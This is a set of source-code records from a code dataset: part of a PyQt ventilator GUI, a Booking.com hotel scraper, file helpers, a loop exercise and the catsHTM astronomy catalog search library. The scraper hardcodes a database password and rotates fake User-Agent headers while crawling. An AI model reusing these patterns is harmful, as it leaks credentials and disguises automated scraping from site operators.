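        # unless a matching QTranslator has been installed, so these literals double as
        # translation keys. A minimal sketch (the "app_ja.qm" file is hypothetical):
        #   translator = QtCore.QTranslator()
        #   if translator.load("app_ja.qm"):
        #       QtWidgets.QApplication.instance().installTranslator(translator)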
self.sPIP_label.setText(_translate(\"MainWindow\", \"Set PIP (mmHg)\"))\r\n self.PHASE_value.setText(_translate(\"MainWindow\", \"INS\"))\r\n self.PHASE_label.setText(_translate(\"MainWindow\", \"System Phase\"))\r\n self.time_label.setText(_translate(\"MainWindow\", \"Time\"))\r\n self.record_button.setText(_translate(\"MainWindow\", \"•\"))\r\n self.vent_time_label.setText(\r\n _translate(\"MainWindow\", \"Ventilation Time\"))\r\n self.graph1_label.setText(_translate(\"MainWindow\", \"INS\\n\"\r\n \"FLOW\"))\r\n self.graph1_value.setText(_translate(\"MainWindow\", \"52.6\"))\r\n self.graph1_units.setText(_translate(\"MainWindow\", \"SLPM\"))\r\n self.graph2_label.setText(_translate(\"MainWindow\", \"EXP\\n\"\r\n \"FLOW\"))\r\n self.graph2_value.setText(_translate(\"MainWindow\", \"24.1\"))\r\n self.graph2_units.setText(_translate(\"MainWindow\", \"SLPM\"))\r\n self.graph3_label.setText(_translate(\"MainWindow\", \"LUNG\\n\"\r\n \"PR\"))\r\n self.graph3_value.setText(_translate(\"MainWindow\", \"12.8\"))\r\n self.graph3_units.setText(_translate(\"MainWindow\", \"mmHg\"))\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"software/ALIVEVent-WooLab-v1.0.py","file_name":"ALIVEVent-WooLab-v1.0.py","file_ext":"py","file_size_in_byte":82944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144484594","text":"import requests, pymysql\nfrom fake_useragent import UserAgent\nimport time\nimport datetime as dt\nfrom bs4 import BeautifulSoup\n\n\n# DB connection settings\n_host = 'localhost'\n_user = 'sa'\n_password = 'QweAsd123'\n_db = 'test'\n\n\n# DB read/write helper methods\ndef addHotel(city, city_link, hotel, hotel_link):\n addHotelCursor = conn.cursor()\n \n addHotelCursor.execute('SELECT 1 FROM `bc_hotels` WHERE `HotelLink` = %(hotel_link)s;', \\\n {'hotel_link':hotel_link})\n res = addHotelCursor.fetchone()\n \n if not res:\n addHotelCursor.execute('Insert into `bc_hotels` (`City`, `CityLink`, `Hotel`, `HotelLink`)'+\\\n 'values(%(city)s, %(city_link)s, %(hotel)s, %(hotel_link)s)',\\\n {'city':city, 'city_link': city_link, 'hotel':hotel, 'hotel_link':hotel_link})\n addHotelCursor.close()\n\n\ndef getHotels():\n \n getHotelsCursor = conn.cursor()\n getHotelsCursor.execute('SELECT `RecId`, `HotelLink`, ' +\\\n 'CASE WHEN `Latitude` is NULL or `Longitude` is NULL THEN 0 ELSE 1 END Coord FROM `bc_hotels`')\n \n hotels_cortege = getHotelsCursor.fetchall()\n getHotelsCursor.close()\n return hotels_cortege\n\n\ndef addRoom(rid, room_name, desc, capacity):\n addRoomCursor = conn.cursor()\n \n addRoomCursor.execute('SELECT 1 FROM `bc_rooms` WHERE `HotelRecId`= %(rid)s and `RoomName`= %(room_name)s',\\\n {'rid':rid, 'room_name':room_name})\n res = addRoomCursor.fetchone()\n \n if not res:\n addRoomCursor.execute('Insert into `bc_rooms` (`HotelRecId`, `RoomName`, `RoomDesc`, `Capacity`)'+\\\n 'values(%(rid)s, %(room_name)s, %(desc)s, %(capacity)s)',\\\n {'rid':rid, 'room_name':room_name, 'desc':desc, 'capacity': capacity})\n \n addRoomCursor.close()\n\n\n\n\n# Create a fake User-Agent\nua = UserAgent()\nheaders = {'User-Agent': ua.random}\n\n# Pages to scrape\nmain_link = 'https://www.booking.com'\ncities_link = '/destination/country/ru.ru.html'\n\n###############################################################\n# Act one: read the cities and walk through them, collecting the hotels in each #\n###############################################################\n'''ses = requests.session()\n\ncities_page = ses.get(main_link+cities_link, headers=headers)\nsoup = BeautifulSoup(cities_page.text)\nli_list = soup.find('li', {'class':'dest-sitemap__list-item'}).findAll('a')\n\ncities = []\nfor i in li_list:\n cities.append([i['title'], i['href']])\n\nhotels = []\ncnt = 0\nfor c, cl in cities:\n\n\n # can be uncommented\n \n cnt+=1\n if cnt == 1000:\n cnt = 0\n print(\"Another 1000 cities processed; total:\"+str(len(cities)))\n \n \n city_page = ses.get(main_link+cl, headers=headers)\n soup = BeautifulSoup(city_page.text)\n li_list = soup.findAll('li', {'class':'dest-sitemap__list-item'})\n for li in li_list:\n for i in li.findAll('a'):\n if '/hotel/' in i['href']:\n _href = i['href']\n _href = _href[0:_href.find('?')]\n hotels.append([c, cl, i['title'], _href])\n #time.sleep(1)\n\n# Write the hotels to the DB\nconn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\nfor city, city_link, hotel, hotel_link in hotels:\n addHotel(city, city_link, hotel, hotel_link)\n\n# Cleanup\nconn.close()\nses.close()'''\n\n\n\n###################################################\n# Act two: get the room capacities for each hotel #\n###################################################\n\n\n# get the hotel list from the DB and iterate over it\nconn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\nhotels_list = getHotels()\nconn.close()\n\ncnt = 0\nerr_list =[]\nfor rid, link, coord in hotels_list:\n\n # reopen the session every 1000 rows\n if cnt == 0:\n conn = pymysql.connect(host=_host, user=_user, password=_password, db=_db, charset='utf8mb4', autocommit=True)\n ses = requests.session()\n headers = {'User-Agent': ua.random}\n\n \n hotel_page = ses.get(main_link+link, headers=headers, allow_redirects=False)\n cnt+=1\n\n # parse the page content\n if not hotel_page.status_code in [301,302]:\n soup = BeautifulSoup(hotel_page.text)\n \n if soup.find('div', {'class':'header-404'}):\n time.sleep(1.2)\n hotel_page = ses.get(main_link+link, headers=headers, allow_redirects=False)\n soup = BeautifulSoup(hotel_page.text)\n \n \n rooms_table = soup.find('table', {'class':'roomstable'})\n if not rooms_table:\n time.sleep(3)\n err_list.append([rid, link])\n\n else:\n rooms_list = rooms_table.find('tbody')\n\n table = []\n for tr in rooms_list.findAll('tr'):\n class_attr_list = tr.attrs.get('class')\n if class_attr_list:\n if 'extendedRow' not in class_attr_list:\n table.append(tr)\n\n for tr in table:\n\n for n, td in enumerate(tr.findAll('td')):\n if n == 0:\n capacity = td.find('span', {'class':'occupancy_adults'})['title'].split(': ')[1]\n if n == 1:\n room_name = td.find('div',{'class':'room-info'}).a.text.replace('/n', ' ')\n if not td.ul:\n desc = 'Empty'\n else:\n desc = td.ul.text.replace('/n', ' ')[0:512]\n if n == 2:\n addRoom(rid, room_name, desc, capacity)\n\n # close and reopen the session every 1000 rows\n if cnt == 1000:\n cnt = 0\n # can be uncommented\n '''\n print(\"Another 1000 hotels processed; total:\"+str(len(hotels_list)))\n '''\n conn.close()\n ses.close()\n\n\n\nprint('Hotels whose info could not be loaded:', err_list)\n\n\n# Close everything once more\nses.close()\ntry:\n conn.close()\nexcept:\n 
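# A tidier pattern for these manual open/close pairs (a sketch, not part of the
# original script) is contextlib.closing, which guarantees cleanup even on errors:
#   from contextlib import closing
#   with closing(pymysql.connect(host=_host, user=_user, password=_password,
#                                db=_db, charset='utf8mb4', autocommit=True)) as conn:
#       with requests.session() as ses:
#           ...  # all DB/HTTP work here; both handles are closed automatically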
pass","sub_path":"Parsers/booking_grabber/hotels_spider.py","file_name":"hotels_spider.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72578562","text":"import os\n# read from file\ndef read(path,filename, count = 1):\n '''\n Read from file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'r')\n if count == 1:\n temp = f.read()\n else:\n temp = f.read(count)\n f.close()\n return temp\n\n\n\n# write to file\ndef write(path, filename, line):\n '''\n write to file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'w')\n f.write(line)\n f.close()\n return \"Успешно\"\n\n# rewrite file\ndef writeAppend(path, filename, line):\n '''\n rewrite\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'a')\n f.write(line)\n f.close()\n return \"Успешно\"\n\n#\ndef findFileInCatalog(path, line):\n '''\n find file in catalog\n '''\n cons = []\n for d, dirs, files in os.walk(path):\n for f in files:\n cons.append(f)\n\n if line in cons:\n return True\n else:\n return False\n \n \n# find da in file\ndef findDataInFile(path, filename, data):\n '''\n find data in file\n '''\n l = path + filename\n assert filename != '' or path != ''\n f = open(l, 'r')\n temp = f.read()\n if data in temp:\n return True\n else:\n return False\n \n \n \n\n \n# sort data \ndef sort(path, filename):\n '''\n sort data\n '''\n points = {}\n l = path+filename\n for line in open(l):\n (val, key) = line.split()\n points[int(val)] = key \n\n l = lambda x: x[0]\n m= sorted(points.items(), key=l, reverse=False)\n \n return m \n\n\n","sub_path":"4 semestr/4 семестр/Програмування/Программы на Python/Лабараторная №3/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"354109770","text":"\" Looping Syntax \"\nlist = [1,2,3,4,5]\nfor x in list:\n print(x)\n\nprint(\"\\nNow printing names...\\n\")\n\n\" Another example \"\nnames = ['Joe', 'Peter', 'Jim', 'Josh']\nfor name in names:\n print(name)\n","sub_path":"exercises/basics/for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626731571","text":"\n\"\"\"*******************************************************\nA python implementation of catsHTM.m\n******************************************************\"\"\"\n#print __doc__\n\nimport math\nimport numpy as np\nfrom . import celestial\nimport scipy.io as sio\nfrom . import params\nimport os.path\nimport h5py\nfrom . import class_HDF5\nimport time\nimport pdb\n#import time\n\nd=dict() #this dictionnary containes the names of the index files loaded in search_htm_ind, and allowes us to avoid loading twice the same index file, which can be time consuming e.g. 
in a loop\n\n# define FileNotFoundError for Python 2.7\ntry:\n FileNotFoundError\nexcept NameError:\n FileNotFoundError = IOError\n\n__all__=['cone_search','search_htm_ind','htm_search_cone','xmatch_2cats','load_trix_by_ind','simplify_list','load_colcell','mfind_bin','match_cats','simplify2','simplify3','Example_QueryAllFun','read_ztf_HDF_matched'] #redefinition of '*' for import *\n\ndef get_CatDir(CatName):\n if CatName == 'TMASS':\n CatDir = '2MASS'\n elif CatName == 'TMASSxsc':\n CatDir = '2MASSxsc'\n elif CatName == 'DECaLS':\n CatDir = 'DECaLS/DR5'\n elif CatName == 'GAIADR1':\n CatDir = 'GAIA/DR1'\n elif CatName == 'GAIADR2':\n CatDir = 'GAIA/DR2'\n elif CatName == 'GALEX':\n CatDir = 'GALEX/DR6Plus7'\n elif CatName == 'HSCv2':\n CatDir = 'HST/HSCv2'\n elif CatName == 'IPHAS':\n CatDir = 'IPHAS/DR2'\n elif CatName == 'NEDz':\n CatDir = 'NED/20180502'\n elif CatName == 'SDSSDR10':\n CatDir = 'SDSS/DR10'\n elif CatName == 'SDSSoffset':\n CatDir = 'SDSS/DR14offset'\n elif CatName == 'SpecSDSS':\n CatDir = 'SpecSDSS/DR14'\n elif CatName == 'SAGE':\n CatDir = 'Spitzer/SAGE'\n elif CatName == 'IRACgc':\n CatDir = 'Spitzer/IRACgc'\n elif CatName == 'UKIDSS':\n CatDir = 'UKIDSS/DR10'\n elif CatName == 'VISTAviking':\n CatDir = 'VISTA/Viking/DR2'\n elif CatName == 'VSTatlas':\n CatDir = 'VST/ATLAS/DR3'\n elif CatName == 'VSTkids':\n CatDir = 'VST/KiDS/DR3'\n elif CatName not in ['AKARI', 'APASS', 'Cosmos', 'FIRST', 'NVSS', 'PS1', 'PTFpc', 'ROSATfsc', 'SkyMapper', 'UCAC4',\n 'WISE', 'XMM']:\n raise ValueError('you need to specify a valid name for the catalog (see README file for list of names)')\n else:\n CatDir = CatName\n return CatDir\n\ndef cone_search(CatName,RA,Dec,Radius,catalogs_dir='./data',RadiusUnits='arcsec',IndexFileTemplate=params.IndexFileTemplate,CatFileTemplate=params.CatFileTemplate\n ,htmTemplate=params.htmTemplate,NcatinFile=params.NcatinFile,IndexVarname=None,ColRa = 0,ColDec=1,OnlyCone=True,\n ColCelFile = params.ColCelFile,OutType= 'np_array',verbose=False):\n \"\"\"Description: Perform a cone search around RA/Dec on a local catalog in HDF5 format sorted into HTM.\n Input : - Catalog name (e.g., 'GAIADR1'). \n - J2000.0 R.A. [radians, [H M S], or sexagesimal string].\n - J2000.0 Dec. [radians, [sign D M S], or sexagesimal string].\n - Search radius [arcsec].\n - Optionnal:RadiusUnits - Radius units. Default is 'arcsec'. DO NOT CHANGE THIS DEFAULT\n IndexFileTemplate - Index Catalog name template. Default is '%s_htm.hdf5'.\n CatFileTemplate - Catalog name template. Default is '%s_htm_%06d.hdf5'.\n htmTemplate - HTM dataset template name. Default is 'htm_%06d'.\n NcatInFile - Maximum number of Datasets in file.Default is 100.\n IndexVarName - Default is None.\n ColRA - Default is 1.\n ColDec - Default is2.\n OnlyCone - Return only sources within cone. If false will return also some objects outside cone. Default is true.\n ColCellFile - Default is '%s_htmColCell.mat'.\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n Output : a numpy array where each line is the catalog line for the sources inside the cone \"\"\"\n #start_time=time.time()\n if verbose==True:\n print('*************')\n print('Catalog: {0}; cone radius: {1} arcsec; cone center: (RA,DEC)=({2},{3})'.format(CatName,Radius,RA,Dec))\n print('*************')\n\n root_to_data=catalogs_dir+'/'\n CatDir=get_CatDir(CatName)\n\n Rad = 180. 
/ math.pi\n\n #if RadiusUnits=='arcsec':\n Radius=Radius/(Rad*3600) #converts arcsec radius into radians radius\n\n ColCelFile=ColCelFile % CatName\n IndexFilename=IndexFileTemplate % CatName\n print(root_to_data+CatDir+'/'+ColCelFile)\n if os.path.isfile(root_to_data+CatDir+'/'+ColCelFile)==True:\n test = sio.loadmat(root_to_data+CatDir+'/'+ColCelFile)\n #print(test)\n if np.shape(test['ColCell'])[1]1:\n ColCell=np.empty((np.shape(cat_onlycone)[1]),dtype=object)\n ColUnits=np.empty((np.shape(cat_onlycone)[1]),dtype=object)\n else:\n ColCell=np.empty((Ncol),dtype=object)\n ColUnits=np.empty((Ncol),dtype=object)\n\n #print(np.shape(test['ColCell']))\n #print(np.shape(ColCell))\n #print(np.shape(cat_onlycone))\n\n if np.shape(test['ColCell'])[1]>np.shape(test['ColCell'])[0]:\n for i,j in enumerate(test['ColCell'][0,:]):\n #print(test['ColCell'][0,i][0])\n ColCell[i]=str(test['ColCell'][0,i][0])\n for i,j in enumerate(test['ColUnits'][0,:]):\n if len(test['ColUnits'][0,i])>0:\n ColUnits[i]=str(test['ColUnits'][0,i][0])\n else:\n ColUnits[i]=' '\n\n else: #rare cases: Cosmos and TMASSxsc\n for i,j in enumerate(test['ColCell'][:,0]):\n #print(str(test['ColCell'][i][0][0]))\n ColCell[i]=str(test['ColCell'][i][0][0])\n for i,j in enumerate(test['ColUnits'][0,:]):\n if len(test['ColUnits'][0,i])>0:\n ColUnits[i]=str(test['ColUnits'][0,i][0])\n else:\n ColUnits[i]=' '\n\n return cat_onlycone,ColCell, ColUnits\n\ndef search_htm_ind(Filename,Long,Lat,Radius,path,VarName=None,CatDir=None,verbose=False):\n \"\"\"Description: wrapper of htm_search_cone, which select from the vector outputed by htm_search_cone only the\n triangles where there are actually sources.\n Input : - Filename: the name of the index_file, e.g. FIRST_htm.hdf5\n Output :\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n\n \"\"\"\n if VarName==None:\n cat_name=Filename.split('_')[0]\n VarName=cat_name+'_HTM'\n\n if VarName not in list(d.values()):\n if verbose==True:\n print('I have not seen the index file corresponding to {0} yet'.format(VarName))\n DataHTM_indexfile = class_HDF5.HDF5(path + '/' + CatDir + '/' + Filename).load(VarName,\n numpy_array=True) # load the indexfile content\n d[str(VarName)+'_name']=VarName\n d[str(VarName)+'_array']= DataHTM_indexfile\n else:\n if verbose==True:\n print('I have already loaded the index file corresponding to {0}'.format(VarName))\n DataHTM_indexfile = d[str(VarName) + '_array']\n\n '''\n #A working alternative to the dictionnay d, with globals()\n if VarName not in list(globals().values()):\n if verbose==True:\n print('I have not see the index file corresponding to {0} yet'.format(VarName))\n print(path + '/' + CatDir + '/' + Filename)\n print(VarName)\n DataHTM_indexfile = class_HDF5.HDF5(path + '/' + CatDir + '/' + Filename).load(VarName,\n numpy_array=True) # load the indexfile content\n\n globals()[str(VarName)+'_name'] = VarName\n globals()[str(VarName)+'_array']= DataHTM_indexfile\n\n else:\n if verbose==True:\n print('I have already loaded the index file corresponding to {0}'.format(VarName))\n DataHTM_indexfile = globals()[str(VarName)+'_array']\n '''\n ID=htm_search_cone(DataHTM_indexfile,Long,Lat,Radius)#,Son_index=Son_index,PolesLong_index=PolesLong_index,PolesLat_index=PolesLat_index) # returns a list of the ID of the winners mesh, i.e. 
the meshes that intercept the circle\n\n ID_array=np.array(ID)\n ID_w_sources=ID_array[DataHTM_indexfile[12,ID]>0] # or the inverse?\n return ID_w_sources\n\ndef htm_search_cone(IndexFile_data,Long,Lat,Radius,Ind=None,Son_index=np.arange(2,6),PolesLong_index=np.arange(6,11,2),PolesLat_index=np.arange(7,12,2)):\n #print('I am running htm_search_cone')\n \"\"\"Description: Search for all HTM leaves intersecting a small circle\n Input :-Either a table of HTM data or an open HDF5 object in which the HTM data is stored\n -Longitude (radians) to search\n -Latitude (radians) to search\n -Radius of the small circle\n Output : a vector of indexes of the winner(s): the \"address\" in the indexfile of the smallest leaf(s) intercepting the cone\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) Feb 2018\n\n \"\"\"\n if Ind is None:\n Sons=np.arange(8)\n else:\n Sons=Ind.astype(int)\n ID=[]\n Nsons=len(Sons)\n PolesLong=np.zeros((3,Nsons)) #3 rows, Nsons columns: each column will hold the pole longitudes of one son mesh\n PolesLat=np.zeros((3, Nsons)) #3 rows, Nsons columns\n\n for i in range(Nsons):#OPTIMIZE\n PolesLong[:,i]=IndexFile_data[PolesLong_index[:],Sons[i]] # array where each column is the 3 pole longitudes of a son mesh HERE: THIS? OR INVERSE?\n PolesLat[:,i]=IndexFile_data[PolesLat_index[:],Sons[i]] # array where each column is the 3 pole latitudes of a son mesh HERE: THIS? OR INVERSE?\n\n Flag=celestial.cone_in_polysphere(PolesLong,PolesLat,Long,Lat,Radius) #check if the cone intercepts any of the son meshes\n\n for i in range(Nsons): #OPTIMIZABLE?\n if Flag[i]==1: #i.e. if the cone overlaps the son with index i\n if np.isnan(IndexFile_data[Son_index[:],Sons[i]]).all()==True:# there are nans in the index_file at the son's index, which means the data is where you are and you cannot go further in the tree\n ID.append(Sons[i])\n else:\n Ind = IndexFile_data[Son_index[:], Sons[i]] - 1.\n #RECURSION IS HERE\n ID.extend(htm_search_cone(IndexFile_data,Long,Lat,Radius,Ind=Ind))\n\n return ID\n\ndef get_index_filename(CatName):\n \"\"\"Description: gets the name of the index file for a given catalog\n Input :- Catalog basename (e.g. 'PS1')\n Output :-name of the index file: <CatName>_htm.hdf5 (careful! in the paper we wrote this as <CatName>_htm_ind.hdf5) (e.g. 'PS1_htm.hdf5')\n -a string <CatName>_HTM (e.g. 'PS1_HTM'), which is the key of the dataset, in the HDF5 file, that contains the 2 columns of the index file\n example: [IndexFileName,IndexVarName]=catsHTM.get_index_filename('PS1')\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\n \"\"\"\n IndexFileName=CatName+'_htm.hdf5'\n IndexVarName=CatName+'_HTM'\n return IndexFileName,IndexVarName\n\ndef load_HTM_ind(Filename,VarName,catalogs_dir='./data',CatDir=None):\n \"\"\"Description: load the content of the catalog index file into a dictionary\n Input :- index file: an HDF5 file which exists per catalog, containing a 2D array with as many columns as trixels (the index = the column index+1: index 1 is in column 0) and each line being:\n [level,Father index,son1 index,son2 index,son3 index,son4 index, Pole1 long, Pole1 lat,Pole2 long, Pole2 lat,Pole3 long, Pole3 lat, either Nan or the data].\n - The name of the dataset with the actual 2D array stored in the index file.
Default is '_HTM'\n Output :- A list of N_trixels dictionnaries containing the 2D matrix info\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n #print('I am looking for the data in',catalogs_dir + '/' + CatDir + '/' +Filename)\n Data=class_HDF5.HDF5(catalogs_dir + '/' + CatDir + '/' +Filename).load(VarName,numpy_array=True)#as many columns as trixels, 13 lines with:\n # [index,Father index,son1 index,son2 index,son3 index,son4 index, Pole1 long, Pole1 lat,Pole2 long, Pole2 lat,Pole3 long, Pole3 lat, either Nan or the data]\n N_trixels=np.shape(Data)[1]\n #print('there are {0} trixels'.format(N_trixels))\n #load this data into a dictionnaries\n #each trixel is a dictionnary\n HTM_list=[]#will end up being a list of N_trixels dictionnaries\n for i in range(N_trixels):\n trixel = dict()\n trixel['level']=Data[0,i]#line 1 of column 0\n if np.isnan(np.array(Data[1,i])).all() == True:\n trixel['father']=[]\n else:\n trixel['father']=Data[1,i]\n if np.isnan(np.array(Data[2,i])).all() == True:\n trixel['son']=[]\n else:\n trixel['son']=Data[2:6,i]\n trixel['PolesCoo'] = np.zeros((3, 2))\n trixel['PolesCoo'][0, 0] = Data[6,i]\n trixel['PolesCoo'][0, 1] = Data[7,i]\n trixel['PolesCoo'][1, 0] = Data[8,i]\n trixel['PolesCoo'][1, 1] = Data[9,i]\n trixel['PolesCoo'][2, 0] = Data[10,i]\n trixel['PolesCoo'][2, 1] = Data[11,i]\n trixel['Nsrc']=Data[12,i]\n HTM_list.append(trixel)\n return HTM_list,Data\n\ndef load_colcell(CatDir,CatName):\n ColCelFile = CatDir+'/'+CatName + '_htmColCell.mat'\n test = sio.loadmat(ColCelFile)\n if np.shape(test['ColCell'])[1] < np.shape(test['ColCell'])[0]:\n # test=test.transpose()\n Ncol = np.shape(test['ColCell'])[0]\n else:\n Ncol = np.shape(test['ColCell'])[1]\n ColCell = np.empty((Ncol), dtype=object)\n ColUnits = np.empty((Ncol), dtype=object)\n if np.shape(test['ColCell'])[1] < np.shape(test['ColCell'])[0]:\n # test=test.transpose()\n Ncol = np.shape(test['ColCell'])[0]\n for i, j in enumerate(test['ColCell'][:, 0]):\n # print(str(test['ColCell'][i][0][0]))\n ColCell[i] = str(test['ColCell'][i][0][0])\n for i, j in enumerate(test['ColUnits'][0, :]):\n if len(test['ColUnits'][0, i]) > 0:\n ColUnits[i] = str(test['ColUnits'][0, i][0])\n else:\n ColUnits[i] = ' '\n else:\n Ncol = np.shape(test['ColCell'])[1]\n for i, j in enumerate(test['ColCell'][0, :]):\n # print(test['ColCell'][0,i][0])\n ColCell[i] = str(test['ColCell'][0, i][0])\n for i, j in enumerate(test['ColUnits'][0, :]):\n if len(test['ColUnits'][0, i]) > 0:\n ColUnits[i] = str(test['ColUnits'][0, i][0])\n else:\n ColUnits[i] = ' '\n return ColCell, ColUnits\n\ndef load_trix_by_ind(CatName,index,SearchParValue=None,num=100,catalogs_dir='./data',Ncol=None,Verbose=True):#load_cat in Eran's library\n \"\"\"Description: given a catalog basename and the index of a trixel, load the content of the corresponding trixel dataset to a numpy array\n Input :- CatName\n - trixel index, or a a dataset name\n - A two element vector of lower and upper value. Only lines in which the sorted parameter is between the low and high value will be retrieved.\n If empty, retrieve all lines. 
Default is empty.\n -number of columns in the catalog.\n Output :-a numpy array with the content of the trixel, Ind ?\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n if isinstance(index,str)==False:\n names=get_file_dataset_from_trixel_id(CatName,index,NfilesinHDF=num,Verbose=Verbose)\n Filename=names[0]\n Data_set_name=names[1]\n CatDir=get_CatDir(CatName)\n\n if SearchParValue is None:\n trixel_data=class_HDF5.HDF5(catalogs_dir + '/'+ CatDir + '/' + Filename).load(Data_set_name, numpy_array=True).T\n Ind=1\n else:\n #load the index file\n VarIndStr=Data_set_name+'_Ind' #the name of the index file\n if Verbose==True:\n print('Filename is',Filename)\n DataInd=class_HDF5.HDF5(catalogs_dir+'/'+CatDir+'/'+Filename).load(VarIndStr,numpy_array=True,Verbose=Verbose).T#the content f the index file\n if len(DataInd)>0:\n Ndi=np.shape(DataInd)[0]\n I1=bin_sear(DataInd[:,1],SearchParValue[0])\n I2=bin_sear(DataInd[:,1],SearchParValue[1])\n #print('before the if, I1 is {0} and I2 is {1}'.format(I1,I2))\n Ind=DataInd[I1,0] #the\n Offset=np.append(DataInd[I1,0]-1,0)\n if I1==I2:\n I2=I2+1\n I2=min(I2,Ndi-1)\n Block=[1+DataInd[I2,0]-DataInd[I1,0],Ncol]\n #print('Block is',Block)\n trixel_data=class_HDF5.HDF5(catalogs_dir+'/'+CatDir+'/'+Filename).load(Data_set_name,Offset=Offset,Block=Block,numpy_array=True,Verbose=Verbose).T\n #seach the indexes of the\n else:\n trixel_data=np.array([])\n Ind=None\n return trixel_data,Ind\n\ndef bin_sear(X,Val): #Util.find.of eran\n \"\"\"Description:\n Input :- sorted vector (ascending)\n - Value to search\n Output :- Index of closest value\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n N=len(X)\n if N==1:\n IndVal=1\n else:\n Ind1=0\n Ind2=N-1\n IndM=math.floor(0.5*N)\n Y1=X[Ind1]\n Y2=X[Ind2]\n Ym=X[IndM]\n Found=0\n while Found==0:\n if Val>Ym:\n Ind1=IndM\n Y1=X[Ind1]\n if Ind2-Ind1>=2:\n IndM= math.floor(0.5*(Ind2+Ind1))\n else:\n Found=1\n if abs(Val-Y1)=2:\n IndM=math.floor(0.5*(Ind1+Ind2))\n else:\n Found=1\n if abs(Val-Y1)X[Im-1]\n #print('FlagU is',FlagU)\n FlagD=np.invert(FlagU)\n #print('FlagD is',FlagD)\n I1[FlagU]=Im[FlagU]\n I2[FlagD]=Im[FlagD]\n PrevIm=Im\n Im=np.floor(0.5*(I1+I2)).astype(int)\n #print('Im is',Im)\n #print('PrevIm is',PrevIm)\n return Im\n\ndef get_file_dataset_from_trixel_id(CatName,index,NfilesinHDF,Verbose=True):#get_file_var_from_htmid in Eran's library\n \"\"\"Description: given a catalog basename and the index of a trixel and the number of trixels in an HDF5 file,\n create the trixel dataset name\n Input :- CatName\n - index\n - NfilesinHDF: number of datasets in an HDF5 files (default is 100)\n Output :- Filename: name of the HDF5 file where the trixel_dataset is stored\n - Datasetname: name of the trixel_dataset\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n\n if Verbose==True:\n print('index is',index)\n num_file=math.floor(index/NfilesinHDF)*NfilesinHDF #equivalent to index//Nfiles*Nfiles\n Filename='%s_htm_%06d.hdf5' % (CatName, num_file)\n DatasetName='htm_%06d' % index\n return Filename,DatasetName\n\ndef Number_of_trixels(Catname,catalogs_dir='./data',CatDir=None):\n \"\"\"Description: finds the number of trixels for a given catalod\n Input :- catalog basename\n Output :- number of trixels for this catalog\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n IndexFileName = get_index_filename(Catname)[0] # name of the index file 
associated with Catname\n IndexVarName=get_index_filename(Catname)[1] # name of the data set containing the index filename content\n List_of_dict=load_HTM_ind(IndexFileName,IndexVarName,catalogs_dir=catalogs_dir,CatDir=CatDir)[0]\n Number_of_trixels_in_cat=len(List_of_dict)\n return Number_of_trixels_in_cat\n\ndef simplify_list(val):\n if isinstance(val, list) == False:\n return val\n else:\n if len(val) > 1:\n return val\n else:\n return simplify_list(val[0])\n\ndef simplify2(x):\n IDc=[]\n for i in x:\n if isinstance(i, (list, tuple, np.ndarray)) == True:\n for j in i:\n IDc.append(j)\n else:\n IDc.append(i)\n return IDc\n #return simplify2(IDc)\n\ndef simplify3(x):\n if isinstance(x[0],(list, tuple, np.ndarray)) == False:\n return x\n else:\n y=simplify2(x)\n #print(y)\n return simplify3(y)\n\ndef match_cats(Cat,Refcat,Radius=2,RadiusUnits='arcsec'):\n \"\"\"Description: translation of VO.search.match_cats of Eran. Given two spherical coordinate catalogs. - for each entry\n in the reference catalog (second input argument), search for all nearby sources in the catalog (first input).\n Input :- A catalog sorted by declination. Ra and Dec in Rad\n - A reference catalog. Ra and Dec in rad\n - 'Radius' - Search radius. This is either a scalar or a vector which length is identical to that of the reference\n catalog (second input). If a vector than each source in the reference catalog may have a different search radius.\n Default is 2 (arcsec).\n - 'RadiusUnits' - Search radius units. See convert.angular for options. Default is 'arcsec'.\n Output :-Vec: a dictionnary with the following keys\n Vec['Nfound']= A vector, the size of RefCat, with the number of sources found in the catalog Cat that are within the search radius from the source with same indice in refcat. in the reference catalog.\n Vec['MinDist']=A vector, the size of RefCat, with the minimum distance (radians) of matched sources in Cat to the source of same indice in RefCat. NaN if not found.\n - Res: a list of dictionnaries (one item per *matched* refernce source! this list is not the size of cat1, it is the size of the\n number of objects in cat1 that DO have at least one cross-matched object in cat2):\n Res['IndRef']=Index of source in reference catalog.\n Res['IndCat']=List of indices in the catalog that are matched to\n% the 'IndRef' source of the reference catalog.\n Res['Dist']= Vecor of angular distances (radians) for each one\n% of the sources indicated in 'IndCat'.\n Res['Num']=Number of sources within search radius\n - IndCatMinDist: vector, the size of Refcat, with the indice of the cat2 nearest sources to the cat1 source of indice Res[Indref]. 
